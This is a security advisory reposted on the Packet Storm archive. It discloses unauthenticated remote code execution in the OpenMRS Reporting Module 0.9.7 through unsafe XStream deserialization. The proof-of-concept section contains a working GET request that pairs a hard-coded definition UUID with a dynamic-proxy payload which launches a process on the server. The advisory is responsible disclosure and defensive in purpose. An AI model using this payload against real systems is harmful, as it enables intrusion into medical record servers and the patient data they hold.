exploit the possibilities

OpenMRS Reporting Module 0.9.7 Remote Code Execution

OpenMRS Reporting Module 0.9.7 Remote Code Execution
Posted Jan 6, 2016
Authored by Brian D. Hysell

OpenMRS Reporting module version 0.9.7 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
MD5 | 5de2ef5f7f0e59cd536751cb082312ed

OpenMRS Reporting Module 0.9.7 Remote Code Execution

Change Mirror Download
Title: Unauthenticated remote code execution in OpenMRS
Product: OpenMRS
Vendor: OpenMRS Inc.
Tested versions: See summary
Status: Fixed by vendor
Reported by: Brian D. Hysell

Product description:

OpenMRS is "the world's leading open source enterprise electronic
medical record system platform."

Vulnerability summary:

The OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a
version of the XStream library vulnerable to CVE-2013-7285, making it
vulnerable to remote code execution. If the Appointment Scheduling UI
Module 1.0.3 is also installed, this RCE is accessible to
unauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform
1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3
installed were confirmed to be vulnerable; other versions and
configurations containing these modules are likely to be vulnerable as
well (see "Remediation").

Details:

In the Reporting module, the method saveSerializedDefinition (mapped
to module/reporting/definition/saveSerializedDefinition) in
InvalidSerializedDefinitionController can be accessed by an
unauthenticated user.

The attacker must provide a valid UUID for a definition present in
OpenMRS or a NullPointerException will be thrown before the remote
code execution can take place. However, upon initialization the
Appointments Scheduling UI module inserts a definition with a constant
UUID hard-coded into AppointmentSchedulingUIConstants
(c1bf0730-e69e-11e3-ac10-0800200c9a66).

Proof of concept:

GET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=<dynamic-proxy><interface>org.openmrs.OpenmrsObject</interface><handler%20class%3d"java.beans.EventHandler"><target%20class%3d"java.lang.ProcessBuilder"><command><string>calc.exe</string></command></target><action>start</action></handler></dynamic-proxy>&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject

Remediation:

The vendor has addressed this issue in OpenMRS Standalone 2.3.1,
OpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5,
1.10.3, and 1.9.10.

Timeline:

Vendor contacted: November 2, 2015
Vendor replied: November 3
CVE requested: November 14 (no response)
Patch released: December 2
Announced: January 6, 2016


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    12 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    16 Files
  • 22
    May 22nd
    13 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close